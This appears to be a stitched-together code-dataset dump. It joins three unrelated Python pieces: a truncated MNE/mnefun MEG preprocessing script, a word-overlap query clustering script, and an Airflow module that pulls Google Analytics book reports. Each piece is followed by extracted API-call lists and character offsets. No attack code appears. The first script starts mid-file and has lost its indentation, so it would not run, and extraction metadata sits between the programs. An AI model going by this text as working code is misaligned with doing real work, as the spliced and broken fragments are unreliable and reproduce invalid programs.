out = ['102_rs160618','103_ac150609','105_bb150713','110_hh160608','127_am151022',
'130_rw151221','132_wp160919','133_ml151124','145_ac160621','150_mg160606',
'151_rd160620','152_tc160422','160_ek160627','161_ak160627','163_lf160707',
'164_sf160707','170_gm160613','172_th160614','174_hs160620','179_gm160701',
'180_zd160621','187_nb161017','201_gs150818','203_am150831',
'204_am150829','205_ac151123','206_lm151119','207_ah160608','211_lb160617',
'nlr_gb310170614','nlr_kb218170619','nlr_jb423170620','nlr_gb267170620','nlr_jb420170621',
'nlr_hb275170622','197_bk170622','nlr_gb355170606','nlr_gb387170608','nlr_hb205170825',
'nlr_ib217170831','nlr_ib319170825','nlr_jb227170811','nlr_jb486170803','nlr_kb396170808',
'nlr_ib357170912']
out = ['211_lb160617']
for n, s in enumerate(out):
print(s)
for n, s in enumerate(out):
params = mnefun.Params(tmin=-0.1, tmax=0.9, n_jobs=18, # t_adjust was -39e-3
decim=2, n_jobs_mkl=1, proj_sfreq=250,
n_jobs_fir='cuda', n_jobs_resample='cuda',
filter_length='5s', epochs_type='fif', lp_cut=40.,
# hp_cut=0.15,hp_trans=0.1,
bmin=-0.1, auto_bad=20., plot_raw=False)
# bem_type = '5120-5120-5120')
params.subjects = [s]
params.sss_type = 'python'
params.sss_regularize = 'in' # 'in' by default
params.tsss_dur = 8. # 60 for adults with not much head movements. This was set to 6.
params.st_correlation = 0.9
params.auto_bad_meg_thresh = 10 # THIS SHOULD NOT BE SO HIGH!
params.trans_to = 'median' #(0., 0., .03) #'median' # None
params.t_adjust = -39e-3 # time delay from the trigger. It's due to set trigger function. I don't know why...
#print("Running " + str(len(params.subjects)) + ' Subjects')
# print("\n\n".join(params.subjects))
print("\n\n")
print("Running " + str(params.subjects))
print("\n\n")
params.subject_indices = np.arange(0,len(params.subjects))
params.structurals =[None] * len(params.subjects)
if s == '164_sf160707':
params.run_names = ['%s_1', '%s_2', '%s_3', '%s_5','%s_6'] # 164_sf160707
elif s == '170_gm160613':
params.run_names = ['%s_1', '%s_2', '%s_3', '%s_5','%s_6'] # 170_gm160613
elif s == '201_gs150729':
params.run_names = ['%s_1', '%s_3', '%s_4', '%s_5', '%s_6', '%s_8'] # 201_gs150729
elif s == '204_am151120':
params.run_names = ['%s_1', '%s_3', '%s_4', '%s_5', '%s_6'] # 204_am151120
elif s == '105_bb161011':
params.run_names = ['%s_1', '%s_2', '%s_4','%s_5','%s_6']
elif s == 'nlr_ib357170912':
params.run_names = ['%s_1', '%s_2', '%s_4','%s_5','%s_6']
elif s == 'nlr_gb355170606':
params.run_names = ['%s_1', '%s_2', '%s_3','%s_5','%s_6']
else:
params.run_names = ['%s_1', '%s_2', '%s_3', '%s_4', '%s_5', '%s_6']
#params.subject_run_indices = np.array([
# np.arange(0,ind[0]),np.arange(0,ind[1]),np.arange(0,ind[2]),np.arange(0,ind[3]),
# np.arange(0,ind[4]),np.arange(0,ind[5]),np.arange(0,ind[6]),np.arange(0,ind[7]),
# np.arange(0,ind[8]),np.arange(0,ind[9])#,np.arange(0,ind[11])
## np.arange(0,ind[12]),np.arange(0,ind[13]),np.arange(0,ind[14]),np.arange(0,ind[15]),
## np.arange(0,ind[16]),np.arange(0,ind[17]),np.arange(0,ind[18]),np.arange(0,ind[19]),
## np.arange(0,ind[20]),np.arange(0,ind[21]),np.arange(0,ind[22]),np.arange(0,ind[23]),
## np.arange(0,ind[24])
#])
params.dates = [(2014, 0, 00)] * len(params.subjects)
#params.subject_indices = [0]
# params.score = score # scoring function to use
params.plot_drop_logs = False
params.on_missing = 'warning'
#params.acq_ssh = '<EMAIL>' # minea - 172.28.161.8
#params.acq_dir = '/sinuhe/data03/jason_words'
# params.acq_ssh = '<EMAIL>' # minea - 172.28.161.8
# params.acq_dir = '/sinuhe/data03/jason_words'
# params.sws_ssh = '<EMAIL>' # kasga - 172.28.161.8
# params.sws_dir = '/data05/jason/NLR'
#params.mf_args = '-hpie 30 -hpig .8 -hpicons' # sjjoo-20160826: We are doing SSS using python
# epoch
    params.reject = dict(grad=3000e-13, mag=4.0e-12)  # same thresholds for all subjects, including 174_hs160620
# params.reject = dict(grad=4000e-13, mag=4.0e-12)
params.ssp_eog_reject = dict(grad=params.reject['grad'], mag=params.reject['mag'], eog=np.inf)
params.ssp_ecg_reject = dict(grad=params.reject['grad'], mag=params.reject['mag'], ecg=np.inf)
params.flat = dict(grad=1e-13, mag=1e-15)
params.auto_bad_reject = dict(grad=2*params.reject['grad'], mag=2*params.reject['mag'])
params.auto_bad_flat = params.flat
params.cov_method = 'shrunk'
params.get_projs_from = range(len(params.run_names))
params.inv_names = ['%s']
params.inv_runs = [range(0, len(params.run_names))]
params.runs_empty = []
params.proj_nums = [[0, 0, 0], # ECG: grad/mag/eeg
[1, 1, 0], # EOG # sjjoo-20160826: was 3
[0, 0, 0]] # Continuous (from ERM)
# The scoring function needs to produce an event file with these values
params.in_names = ['word_c254_p20_dot', 'word_c254_p50_dot', 'word_c137_p20_dot',
'word_c254_p80_dot', 'word_c137_p80_dot',
'bigram_c254_p20_dot', 'bigram_c254_p50_dot', 'bigram_c137_p20_dot',
'word_c254_p20_word', 'word_c254_p50_word', 'word_c137_p20_word',
'word_c254_p80_word', 'word_c137_p80_word',
'bigram_c254_p20_word', 'bigram_c254_p50_word', 'bigram_c137_p20_word']
params.in_numbers = [101, 102, 103, 104, 105, 106, 107, 108,
201, 202, 203, 204, 205, 206, 207, 208]
# These lines define how to translate the above event types into evoked files
params.analyses = [
'All',
'Conditions'
]
params.out_names = [
['ALL'],
['word_c254_p20_dot', 'word_c254_p50_dot', 'word_c137_p20_dot',
'word_c254_p80_dot', 'word_c137_p80_dot',
'bigram_c254_p20_dot', 'bigram_c254_p50_dot', 'bigram_c137_p20_dot',
'word_c254_p20_word', 'word_c254_p50_word', 'word_c137_p20_word',
'word_c254_p80_word', 'word_c137_p80_word',
'bigram_c254_p20_word', 'bigram_c254_p50_word', 'bigram_c137_p20_word']
]
params.out_numbers = [
[1] * len(params.in_numbers),
[101, 102, 103, 104, 105, 106, 107, 108,
201, 202, 203, 204, 205, 206, 207, 208]
]
params.must_match = [
[],
[],
]
# Set what will run
mnefun.do_processing(
params,
fetch_raw=False, # Fetch raw recording files from acquisition machine
do_score=False, # Do scoring to slice data into trials
# Before running SSS, make SUBJ/raw_fif/SUBJ_prebad.txt file with
# space-separated list of bad MEG channel numbers
push_raw=False, # Push raw files and SSS script to SSS workstation
do_sss=False, # Run SSS remotely (on sws) or locally with mne-python
fetch_sss=False, # Fetch SSSed files from SSS workstation
do_ch_fix=False, # Fix channel ordering
# Before running SSP, examine SSS'ed files and make
# SUBJ/bads/bad_ch_SUBJ_post-sss.txt; usually, this should only contain EEG
# channels.
gen_ssp=True, # Generate SSP vectors
apply_ssp=True, # Apply SSP vectors and filtering
# plot_psd=False, # Plot raw data power spectra
write_epochs=True, # Write epochs to disk
gen_covs=False, # Generate covariances
# Make SUBJ/trans/SUBJ-trans.fif using mne_analyze; needed for fwd calc.
gen_fwd=False, # Generate forward solutions (and src space if needed)
gen_inv=False, # Generate inverses
gen_report=False, # Write mne report html of results to disk
print_status=False, # Print completeness status update
# params,
# fetch_raw=False,
# do_score=True, # True
# push_raw=False,
# do_sss=True, # True
# fetch_sss=False,
# do_ch_fix=True, # True
# gen_ssp=True, # True
# apply_ssp=True, # True
# write_epochs=True, # True
# plot_psd=False,
# gen_covs=False,
# gen_fwd=False,
# gen_inv=False,
# print_status=False,
# gen_report=True # true
)
print('%i sec' % (time.time() - t0,))
|
[
"os.mkdir",
"os.path.isdir",
"mnefun.do_processing",
"time.time",
"mne.set_config",
"mnefun.Params",
"os.chdir"
] |
[((156, 211), 'os.chdir', 'os.chdir', (['"""/home/sjjoo/git/BrainTools/projects/NLR_MEG"""'], {}), "('/home/sjjoo/git/BrainTools/projects/NLR_MEG')\n", (164, 211), False, 'import os\n'), ((369, 380), 'time.time', 'time.time', ([], {}), '()\n', (378, 380), False, 'import time\n'), ((382, 420), 'mne.set_config', 'mne.set_config', (['"""MNE_USE_CUDA"""', '"""true"""'], {}), "('MNE_USE_CUDA', 'true')\n", (396, 420), False, 'import mne\n'), ((2997, 3014), 'os.chdir', 'os.chdir', (['out_dir'], {}), '(out_dir)\n', (3005, 3014), False, 'import os\n'), ((595, 617), 'os.path.isdir', 'os.path.isdir', (['out_dir'], {}), '(out_dir)\n', (608, 617), False, 'import os\n'), ((623, 640), 'os.mkdir', 'os.mkdir', (['out_dir'], {}), '(out_dir)\n', (631, 640), False, 'import os\n'), ((5644, 5878), 'mnefun.Params', 'mnefun.Params', ([], {'tmin': '(-0.1)', 'tmax': '(0.9)', 'n_jobs': '(18)', 'decim': '(2)', 'n_jobs_mkl': '(1)', 'proj_sfreq': '(250)', 'n_jobs_fir': '"""cuda"""', 'n_jobs_resample': '"""cuda"""', 'filter_length': '"""5s"""', 'epochs_type': '"""fif"""', 'lp_cut': '(40.0)', 'bmin': '(-0.1)', 'auto_bad': '(20.0)', 'plot_raw': '(False)'}), "(tmin=-0.1, tmax=0.9, n_jobs=18, decim=2, n_jobs_mkl=1,\n proj_sfreq=250, n_jobs_fir='cuda', n_jobs_resample='cuda',\n filter_length='5s', epochs_type='fif', lp_cut=40.0, bmin=-0.1, auto_bad\n =20.0, plot_raw=False)\n", (5657, 5878), False, 'import mnefun\n'), ((11634, 11905), 'mnefun.do_processing', 'mnefun.do_processing', (['params'], {'fetch_raw': '(False)', 'do_score': '(False)', 'push_raw': '(False)', 'do_sss': '(False)', 'fetch_sss': '(False)', 'do_ch_fix': '(False)', 'gen_ssp': '(True)', 'apply_ssp': '(True)', 'write_epochs': '(True)', 'gen_covs': '(False)', 'gen_fwd': '(False)', 'gen_inv': '(False)', 'gen_report': '(False)', 'print_status': '(False)'}), '(params, fetch_raw=False, do_score=False, push_raw=\n False, do_sss=False, fetch_sss=False, do_ch_fix=False, gen_ssp=True,\n apply_ssp=True, write_epochs=True, gen_covs=False, gen_fwd=False,\n gen_inv=False, gen_report=False, print_status=False)\n', (11654, 11905), False, 'import mnefun\n'), ((13517, 13528), 'time.time', 'time.time', ([], {}), '()\n', (13526, 13528), False, 'import time\n')]
|
import bag_of_wording
import argparse
from collections import OrderedDict
from collections.abc import Iterable
def find_most_similar(bags_of_words):
biggest_overlap = [0, (0, 0)]
keys = list(bags_of_words)
for i in range(len(keys) - 1):
for j in range(i + 1, len(keys)):
seq1 = bags_of_words[keys[i]]
seq2 = bags_of_words[keys[j]]
try:
norm_overlap = len(seq1.intersection(seq2)) / max(len(seq1), len(seq2))
except ZeroDivisionError: # in case the BoW-extraction left an empty set
norm_overlap = 0
if norm_overlap > biggest_overlap[0]:
biggest_overlap[0] = norm_overlap
biggest_overlap[1] = (keys[i], keys[j])
return biggest_overlap
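# Worked example (illustrative, not from the original code) of the normalised
# overlap above: for seq1 = {"a", "b", "c"} and seq2 = {"b", "c", "d", "e"},
# len(seq1 & seq2) / max(len(seq1), len(seq2)) = 2 / 4 = 0.5.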
def word_overlap_clustering(queries, bags_of_words, overlap_threshold):
for query in queries:
bows_for_query = {k: v for k, v in bags_of_words.items() if k.split('.')[0] == query}
bows_for_query = OrderedDict(sorted(bows_for_query.items(), key=lambda t: t[0])) # ensures stability of the clustering through multiple runs
while True:
overlap, to_merge = find_most_similar(bows_for_query)
if overlap <= overlap_threshold:
yield bows_for_query.keys()
break
bows_for_query[to_merge] = bows_for_query[to_merge[0]].union(bows_for_query[to_merge[1]])
bows_for_query.pop(to_merge[0])
bows_for_query.pop(to_merge[1])
def flatten(sequence):
"""
Since the clustering produces hierarchical clusters in the form ((((1,2),3),(4,5)),6), a 'flattening'
is needed in order to write the desired output.
((((1,2),3),(4,5)),6) -> (1, 2, 3, 4, 5, 6)
"""
for elm in sequence:
if isinstance(elm, Iterable) and not isinstance(elm, str):
yield from flatten(elm)
else:
yield elm
def write_output(clustering, filename):
with open(filename, 'w') as f:
f.write('subTopicID\tresultID\n')
for query in clustering:
for i, cluster in enumerate(query):
for element in cluster:
f.write('{}.{}\t{}\n'.format(element.split('.')[0], i, element))
if __name__ == "__main__":
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-i', '--input_dir', help='Dataset directory, containing the topics.txt and results.txt files.')
parser.add_argument('-o', '--output_file', help='Output file name (if need be with an *existing* directory).', default="output.txt")
parser.add_argument('-t', '--overlap_threshold', type=float, help='The overlap threshold of the clustering algorithm (ignored if -b specified).', default=0.02)
parser.add_argument('-b', '--baseline', help='Produces the simplified system output, with overlap threshold = 0 and a TreeTagger file from the input directory.', action="store_true")
args = parser.parse_args()
queries = bag_of_wording.extract_queries(args.input_dir + "/topics.txt")
if args.baseline:
bows = bag_of_wording.extract_bow_treetagger(queries, args.input_dir + "/tagged.txt")
overlap_threshold = 0
else:
bows = bag_of_wording.extract_bow(queries, args.input_dir + "/results.txt")
overlap_threshold = args.overlap_threshold
final_clustering = []
for clustering in word_overlap_clustering(queries, bows, overlap_threshold):
clustering_for_query = []
for cl in clustering:
if not isinstance(cl, str):
clustering_for_query.append(list(flatten(cl)))
final_clustering.append(clustering_for_query)
write_output(final_clustering, args.output_file)
|
[
"bag_of_wording.extract_queries",
"bag_of_wording.extract_bow_treetagger",
"argparse.ArgumentParser",
"bag_of_wording.extract_bow"
] |
[((2498, 2577), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), '(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n', (2521, 2577), False, 'import argparse\n'), ((3247, 3309), 'bag_of_wording.extract_queries', 'bag_of_wording.extract_queries', (["(args.input_dir + '/topics.txt')"], {}), "(args.input_dir + '/topics.txt')\n", (3277, 3309), False, 'import bag_of_wording\n'), ((3347, 3425), 'bag_of_wording.extract_bow_treetagger', 'bag_of_wording.extract_bow_treetagger', (['queries', "(args.input_dir + '/tagged.txt')"], {}), "(queries, args.input_dir + '/tagged.txt')\n", (3384, 3425), False, 'import bag_of_wording\n'), ((3481, 3549), 'bag_of_wording.extract_bow', 'bag_of_wording.extract_bow', (['queries', "(args.input_dir + '/results.txt')"], {}), "(queries, args.input_dir + '/results.txt')\n", (3507, 3549), False, 'import bag_of_wording\n')]
|
# Copyright 2020 Curtin University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Author: <NAME>
from __future__ import annotations
import logging
import os
from datetime import timedelta
from typing import Dict, List, Optional, Tuple
import pendulum
from airflow.exceptions import AirflowException, AirflowSkipException
from airflow.hooks.base import BaseHook
from google.cloud import bigquery
from googleapiclient.discovery import Resource, build
from oauth2client.service_account import ServiceAccountCredentials
from observatory.api.client.model.organisation import Organisation
from oaebu_workflows.config import schema_folder as default_schema_folder
from observatory.platform.utils.airflow_utils import AirflowConns, AirflowVars
from observatory.platform.utils.file_utils import list_to_jsonl_gz
from observatory.platform.utils.workflow_utils import add_partition_date, make_dag_id
from observatory.platform.workflows.organisation_telescope import OrganisationRelease, OrganisationTelescope
class GoogleAnalyticsRelease(OrganisationRelease):
def __init__(
self, dag_id: str, start_date: pendulum.DateTime, end_date: pendulum.DateTime, organisation: Organisation
):
"""Construct a GoogleAnalyticsRelease.
:param dag_id: the id of the DAG.
:param start_date: the start date of the download period.
:param end_date: the end date of the download period, also used as release date for BigQuery table and
file paths
:param organisation: the Organisation of which data is processed.
"""
self.dag_id_prefix = GoogleAnalyticsTelescope.DAG_ID_PREFIX
transform_files_regex = f"{self.dag_id_prefix}.jsonl.gz"
super().__init__(
dag_id=dag_id, release_date=end_date, organisation=organisation, transform_files_regex=transform_files_regex
)
self.start_date = start_date
self.end_date = end_date
@property
def transform_path(self) -> str:
"""Get the path to the transformed file.
:return: the file path.
"""
return os.path.join(self.transform_folder, f"{self.dag_id_prefix}.jsonl.gz")
def download_transform(self, view_id: str, pagepath_regex: str) -> bool:
"""Downloads and transforms an individual Google Analytics release.
:param view_id: The view id.
:param pagepath_regex: The regex expression for the pagepath of a book.
:return: True when data available for period, False if no data is available
"""
service = initialize_analyticsreporting()
results = get_reports(service, self.organisation.name, view_id, pagepath_regex, self.start_date, self.end_date)
results = add_partition_date(results, self.release_date, bigquery.TimePartitioningType.MONTH)
if results:
list_to_jsonl_gz(self.transform_path, results)
return True
else:
if (pendulum.today("UTC") - self.end_date).in_months() >= 26:
logging.info(
"No data available. Google Analytics data is only available for 26 months, see "
"https://support.google.com/analytics/answer/7667196?hl=en for more info"
)
return False
class GoogleAnalyticsTelescope(OrganisationTelescope):
"""Google Analytics Telescope."""
DAG_ID_PREFIX = "google_analytics"
ANU_ORG_NAME = "ANU Press"
def __init__(
self,
organisation: Organisation,
view_id: str,
pagepath_regex: str,
dag_id: Optional[str] = None,
start_date: pendulum.DateTime = pendulum.datetime(2018, 1, 1),
schedule_interval: str = "@monthly",
dataset_id: str = "google",
schema_folder: str = default_schema_folder(),
catchup: bool = True,
airflow_vars=None,
airflow_conns=None,
schema_prefix: str = "",
):
"""Construct a GoogleAnalyticsTelescope instance.
:param organisation: the Organisation of which data is processed.
:param view_id: the view ID, obtained from the 'extra' info from the API regarding the telescope.
:param pagepath_regex: the pagepath regex expression, obtained from the 'extra' info from the
API regarding the telescope.
:param dag_id: the id of the DAG, by default this is automatically generated based on the DAG_ID_PREFIX and the
organisation name.
:param start_date: the start date of the DAG.
:param schedule_interval: the schedule interval of the DAG.
:param schema_folder: the SQL schema path.
:param catchup: whether to catchup the DAG or not.
:param airflow_vars: list of airflow variable keys, for each variable it is checked if it exists in airflow
:param schema_prefix: the prefix used to find the schema path.
"""
if airflow_vars is None:
airflow_vars = [
AirflowVars.DATA_PATH,
AirflowVars.PROJECT_ID,
AirflowVars.DATA_LOCATION,
AirflowVars.DOWNLOAD_BUCKET,
AirflowVars.TRANSFORM_BUCKET,
]
if airflow_conns is None:
airflow_conns = [AirflowConns.OAEBU_SERVICE_ACCOUNT]
if dag_id is None:
dag_id = make_dag_id(self.DAG_ID_PREFIX, organisation.name)
# set schema prefix to 'anu_press' for ANU press, custom dimensions are added in this schema.
if schema_prefix == "":
schema_prefix = "anu_press_" if organisation.name == self.ANU_ORG_NAME else ""
super().__init__(
organisation,
dag_id,
start_date,
schedule_interval,
dataset_id,
schema_folder,
catchup=catchup,
airflow_vars=airflow_vars,
airflow_conns=airflow_conns,
schema_prefix=schema_prefix,
)
self.view_id = view_id
self.pagepath_regex = pagepath_regex
self.add_setup_task_chain([self.check_dependencies])
self.add_task_chain([self.download_transform, self.upload_transformed, self.bq_load_partition, self.cleanup])
def make_release(self, **kwargs) -> List[GoogleAnalyticsRelease]:
"""Make release instances. The release is passed as an argument to the function (TelescopeFunction) that is
called in 'task_callable'.
:param kwargs: the context passed from the PythonOperator. See
https://airflow.apache.org/docs/stable/macros-ref.html for a list of the keyword arguments that are
passed to this argument.
        :return: A list of GoogleAnalyticsRelease instances
"""
# Get start and end date (end_date = release_date)
start_date = kwargs["execution_date"]
end_date = kwargs["next_execution_date"] - timedelta(days=1)
logging.info(f"Start date: {start_date}, end date:{end_date}, release date: {end_date}")
releases = [GoogleAnalyticsRelease(self.dag_id, start_date, end_date, self.organisation)]
return releases
def check_dependencies(self, **kwargs) -> bool:
"""Check dependencies of DAG. Add to parent method to additionally check for a view id and pagepath regex
:return: True if dependencies are valid.
"""
super().check_dependencies()
if self.view_id is None or self.pagepath_regex is None:
expected_extra = {"view_id": "the_view_id", "pagepath_regex": r"pagepath_regex"}
raise AirflowException(
f"View ID and/or pagepath regex is not set in 'extra' of telescope, extra example: " f"{expected_extra}"
)
return True
def download_transform(self, releases: List[GoogleAnalyticsRelease], **kwargs):
"""Task to download and transform the google analytics release for a given month.
:param releases: a list with one google analytics release.
:return: None.
"""
results = releases[0].download_transform(self.view_id, self.pagepath_regex)
if not results:
raise AirflowSkipException("No Google Analytics data available to download.")
def initialize_analyticsreporting() -> Resource:
"""Initializes an Analytics Reporting API V4 service object.
:return: An authorized Analytics Reporting API V4 service object.
"""
oaebu_account_conn = BaseHook.get_connection(AirflowConns.OAEBU_SERVICE_ACCOUNT)
scopes = ["https://www.googleapis.com/auth/analytics.readonly"]
creds = ServiceAccountCredentials.from_json_keyfile_dict(oaebu_account_conn.extra_dejson, scopes=scopes)
# Build the service object.
service = build("analyticsreporting", "v4", credentials=creds, cache_discovery=False)
return service
def list_all_books(
service: Resource,
view_id: str,
pagepath_regex: str,
start_date: pendulum.DateTime,
end_date: pendulum.DateTime,
organisation_name: str,
) -> Tuple[List[dict], list]:
"""List all available books by getting all pagepaths of a view id in a given period.
:param service: The Google Analytics Reporting service object.
:param view_id: The view id.
:param pagepath_regex: The regex expression for the pagepath of a book.
:param start_date: Start date of analytics period
:param end_date: End date of analytics period
:param organisation_name: The organisation name.
:return: A list with dictionaries, one for each book entry (the dict contains the pagepath, title and average time
on page) and a list of all pagepaths.
"""
# Get pagepath, pagetitle and average time on page for each path
body = {
"reportRequests": [
{
"viewId": view_id,
"pageSize": 10000,
"dateRanges": [
{
"startDate": start_date.strftime("%Y-%m-%d"),
"endDate": end_date.strftime("%Y-%m-%d"),
}
],
"metrics": [{"expression": "ga:avgTimeOnPage"}],
"dimensions": [{"name": "ga:pagepath"}, {"name": "ga:pageTitle"}],
"dimensionFilterClauses": [
{
"operator": "AND",
"filters": [
{"dimensionName": "ga:pagepath", "operator": "REGEXP", "expressions": [pagepath_regex]}
],
}
],
}
]
}
# add all 6 custom dimensions for anu press
if organisation_name == GoogleAnalyticsTelescope.ANU_ORG_NAME:
for i in range(1, 7):
body["reportRequests"][0]["dimensions"].append({"name": f"ga:dimension{str(i)}"})
reports = service.reports().batchGet(body=body).execute()
all_book_entries = reports["reports"][0]["data"].get("rows")
next_page_token = reports["reports"][0].get("nextPageToken")
while next_page_token:
body["reportRequests"][0]["pageToken"] = next_page_token
reports = service.reports().batchGet(body=body).execute()
book_entries = reports["reports"][0]["data"].get("rows")
next_page_token = reports["reports"][0].get("nextPageToken")
all_book_entries += book_entries
# create list with just pagepaths
if all_book_entries:
pagepaths = [path["dimensions"][0] for path in all_book_entries]
else:
pagepaths = []
return all_book_entries, pagepaths
def create_book_result_dicts(
book_entries: List[dict], start_date: pendulum.DateTime, end_date: pendulum.DateTime, organisation_name: str
) -> Dict[str, dict]:
"""Create a dictionary to store results for a single book. Pagepath, title and avg time on page are already given.
The other metrics will be added to the dictionary later.
:param book_entries: List with dictionaries of book entries.
:param start_date: Start date of analytics period.
:param end_date: End date of analytics period.
:param organisation_name: The organisation name.
:return: Dict to store results
"""
book_results = {}
for entry in book_entries:
pagepath = entry["dimensions"][0]
pagetitle = entry["dimensions"][1]
average_time = float(entry["metrics"][0]["values"][0])
book_result = {
"url": pagepath,
"title": pagetitle,
"start_date": start_date.strftime("%Y-%m-%d"),
"end_date": end_date.strftime("%Y-%m-%d"),
"average_time": average_time,
"unique_views": {"country": {}, "referrer": {}, "social_network": {}},
"sessions": {"country": {}, "source": {}},
}
# add custom dimension data for ANU Press
if organisation_name == GoogleAnalyticsTelescope.ANU_ORG_NAME:
# matches dimension order in 'list_all_books'
custom_dimensions = {
"publication_id": entry["dimensions"][2],
"publication_type": entry["dimensions"][3],
"publication_imprint": entry["dimensions"][4],
"publication_group": entry["dimensions"][5],
"publication_whole_or_part": entry["dimensions"][6],
"publication_format": entry["dimensions"][7],
}
book_result = dict(book_result, **custom_dimensions)
book_results[pagepath] = book_result
return book_results
def get_dimension_data(
service: Resource,
view_id: str,
start_date: pendulum.DateTime,
end_date: pendulum.DateTime,
metrics: list,
dimension: dict,
pagepaths: list,
) -> list:
"""Get reports data from the Google Analytics Reporting service for a single dimension and multiple metrics.
The results are filtered by pagepaths of interest and ordered by pagepath as well.
:param service: The Google Analytics Reporting service.
:param view_id: The view id.
:param start_date: The start date of the analytics period.
:param end_date: The end date of the analytics period.
:param metrics: List with dictionaries of metric.
:param dimension: The dimension.
:param pagepaths: List with pagepaths to filter and sort on.
:return: List with reports data for dimension and metrics.
"""
body = {
"reportRequests": [
{
"viewId": view_id,
"pageSize": 10000,
"dateRanges": [
{
"startDate": start_date.strftime("%Y-%m-%d"),
"endDate": end_date.strftime("%Y-%m-%d"),
}
],
"metrics": metrics,
"dimensions": [{"name": "ga:pagePath"}, dimension],
"dimensionFilterClauses": [
{"filters": [{"dimensionName": "ga:pagePath", "operator": "IN_LIST", "expressions": pagepaths}]}
],
"orderBys": [{"fieldName": "ga:pagepath"}],
}
]
}
reports = service.reports().batchGet(body=body).execute()
all_dimension_data = reports["reports"][0]["data"].get("rows")
next_page_token = reports["reports"][0].get("nextPageToken")
while next_page_token:
body["reportRequests"][0]["pageToken"] = next_page_token
reports = service.reports().batchGet(body=body).execute()
dimension_data = reports["reports"][0]["data"].get("rows")
next_page_token = reports["reports"][0].get("nextPageToken")
all_dimension_data += dimension_data
return all_dimension_data
def add_to_book_result_dict(book_results: dict, dimension: dict, pagepath: str, unique_views: dict, sessions: dict):
"""Add the 'unique_views' and 'sessions' results to the book results dict if these metrics are of interest for the
current dimension.
:param book_results: A dictionary with all book results.
:param dimension: Current dimension for which 'unique_views' and 'sessions' data is given.
:param pagepath: Pagepath of the book.
:param unique_views: Number of unique views for the pagepath&dimension
:param sessions: Number of sessions for the pagepath&dimension
:return: None
"""
# map the dimension name to the field name in BigQuery. The ga:dimensionX are obtained from custom ANU press
# dimensions
mapping = {
"ga:country": "country",
"ga:fullReferrer": "referrer",
"ga:socialNetwork": "social_network",
"ga:source": "source",
}
column_name = mapping[dimension["name"]]
if column_name in ["country", "referrer", "social_network"]:
book_results[pagepath]["unique_views"][column_name] = unique_views
if column_name in ["country", "source"]:
book_results[pagepath]["sessions"][column_name] = sessions
def get_reports(
service: Resource,
organisation_name: str,
view_id: str,
pagepath_regex: str,
start_date: pendulum.DateTime,
end_date: pendulum.DateTime,
) -> list:
"""Get reports data from the Google Analytics Reporting API.
:param service: The Google Analytics Reporting service.
:param organisation_name: Name of the organisation.
:param view_id: The view id.
:param pagepath_regex: The regex expression for the pagepath of a book.
:param start_date: Start date of analytics period
:param end_date: End date of analytics period
:return: List with google analytics data for each book
"""
# list all books
book_entries, pagepaths = list_all_books(service, view_id, pagepath_regex, start_date, end_date, organisation_name)
# if no books in period return empty list and raise airflow skip exception
if not book_entries:
return []
# create dict with dict for each book to store results
book_results = create_book_result_dicts(book_entries, start_date, end_date, organisation_name)
metric_names = ["uniquePageviews", "sessions"]
metrics = [{"expression": f"ga:{metric}"} for metric in metric_names]
dimension_names = ["country", "fullReferrer", "socialNetwork", "source"]
dimensions = [{"name": f"ga:{dimension}"} for dimension in dimension_names]
# get data per dimension
for dimension in dimensions:
dimension_data = get_dimension_data(service, view_id, start_date, end_date, metrics, dimension, pagepaths)
prev_pagepath = None
unique_views = {}
sessions = {}
# entry is combination of book pagepath & dimension
for entry in dimension_data:
pagepath = entry["dimensions"][0]
dimension_value = entry["dimensions"][1] # e.g. 'Australia' for 'country' dimension
if prev_pagepath and pagepath != prev_pagepath:
add_to_book_result_dict(book_results, dimension, prev_pagepath, unique_views, sessions)
unique_views = {}
sessions = {}
# add values if they are not 0
views_metric = int(entry["metrics"][0]["values"][0])
sessions_metric = int(entry["metrics"][0]["values"][1])
if views_metric > 0:
unique_views[dimension_value] = views_metric
if sessions_metric > 0:
sessions[dimension_value] = sessions_metric
prev_pagepath = pagepath
else:
# the for-else always runs here (there is no break above); flush the results for the final pagepath
if prev_pagepath:
add_to_book_result_dict(book_results, dimension, prev_pagepath, unique_views, sessions)
# transform each nested dict of counts into a list of {'name': ..., 'value': ...} records
for book, result in book_results.items():
for field, value in result.items():
# field is 'unique_views' or 'sessions'
if isinstance(value, dict):
# nested_field is 'country', 'referrer' or 'social_network'
for nested_field, nested_value in value.items():
values = []
# k is e.g. 'Australia', v is e.g. 1
for k, v in nested_value.items():
values.append({"name": k, "value": v})
book_results[book][field][nested_field] = values
# convert dict to list of results
book_results = [book_results[k] for k in book_results]
return book_results
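# (Editorial sketch, not part of the original module) How get_reports might be
# driven. `build_reporting_service` is a hypothetical stand-in for whatever
# constructs the Google Analytics Reporting `service` object:
#
# service = build_reporting_service()
# results = get_reports(
# service,
# organisation_name="ANU Press",
# view_id="123456",
# pagepath_regex=r"/book/.+",
# start_date=pendulum.datetime(2021, 1, 1),
# end_date=pendulum.datetime(2021, 1, 31),
# )
# # `results` is a list of per-book dicts holding nested 'unique_views' and
# # 'sessions' breakdowns per country/referrer/social_network/source.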
|
[
"observatory.platform.utils.workflow_utils.make_dag_id",
"observatory.platform.utils.file_utils.list_to_jsonl_gz",
"os.path.join",
"airflow.hooks.base.BaseHook.get_connection",
"pendulum.datetime",
"logging.info",
"datetime.timedelta",
"airflow.exceptions.AirflowException",
"airflow.exceptions.AirflowSkipException",
"pendulum.today",
"oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_dict",
"observatory.platform.utils.workflow_utils.add_partition_date",
"googleapiclient.discovery.build",
"oaebu_workflows.config.schema_folder"
] |
